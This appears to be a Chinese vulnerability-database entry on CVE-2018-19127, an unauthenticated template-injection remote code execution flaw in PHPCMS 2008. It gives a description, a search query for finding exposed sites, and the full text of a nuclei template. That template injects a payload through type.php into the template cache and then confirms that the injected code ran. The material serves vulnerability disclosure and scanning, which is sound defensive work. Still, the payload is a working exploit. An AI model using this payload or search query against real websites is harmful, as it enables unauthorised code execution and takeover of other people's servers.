PHPCMS 2008 远程代码执行漏洞

漏洞信息

漏洞名称: PHPCMS 2008 远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2018-19127

漏洞类型: 服务端模板注入

漏洞等级: 严重

漏洞描述: PHPCMS 2008是一款老旧的PHP内容管理系统,广泛用于构建网站和管理内容。由于其历史悠久,许多网站可能仍在使用此系统,尤其是在中国。该系统因其易用性和灵活性而受到欢迎,但由于停止维护,存在多个安全漏洞。

该漏洞属于服务端模板注入类型,攻击者可以通过type.php文件中的模板注入漏洞,将恶意内容写入PHP模板缓存文件中,从而执行任意代码。漏洞的根本原因在于系统未对用户输入进行严格的验证和过滤,导致攻击者可以注入恶意代码。

成功利用此漏洞的攻击者可以在服务器上执行任意代码,完全控制受影响的系统。由于漏洞无需认证即可利用,风险极高。攻击者可以利用此漏洞进行数据泄露、服务中断或进一步的网络渗透。由于PHPCMS 2008已停止维护,建议用户立即停止使用或限制公共访问,以防止潜在的安全威胁。

产品厂商: PHPCMS

产品名称: PHPCMS 2008

搜索语法: http.html:”Powered by phpcms”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/42570c21945fc41ae45a467c47c2a7cc716b3011/http%2Fcves%2F2018%2FCVE-2018-19127.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: CVE-2018-19127

info:
  name: PHPCMS 2008 - Remote Code Execution via Template Injection
  author: tomaquet18
  severity: critical
  description: |
    PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable.
  impact: |
    Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control.
  remediation: |
    The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it.
  reference:
    - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
    - https://github.com/advisories/GHSA-p498-q357-m3p7
  tags: cve,phpcms,rce,template-injection,unauth

  metadata:
    max-request: 2
    shodan-query: http.html:"Powered by phpcms"
    verified: false

variables:
  payload: "tag_(){};echo(md5(123));{//../rss"

http:
  - method: GET
    path:
      - "{{BaseURL}}/type.php?template={{payload}}"

    unsafe: true
    max-redirects: 0
    stop-at-first-match: true

    matchers:
      - type: status
        internal: true
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/data/cache_template/rss.tpl.php"

    unsafe: true
    max-redirects: 0
    stop-at-first-match: true

    matchers:
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"